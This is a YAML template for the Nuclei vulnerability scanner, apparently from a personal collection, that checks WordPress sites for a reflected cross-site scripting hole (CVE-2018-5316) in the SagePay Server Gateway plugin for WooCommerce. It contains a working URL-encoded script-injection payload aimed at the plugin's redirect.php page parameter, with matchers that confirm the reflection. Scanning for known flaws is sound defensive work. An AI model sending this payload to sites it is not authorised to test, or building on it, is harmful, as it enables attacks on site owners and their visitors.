my-nuclei-templates/CVE-2018-5316.yaml

31 lines
898 B
YAML

id: CVE-2018-5316
info:
name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
tags: cve,cve2018,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200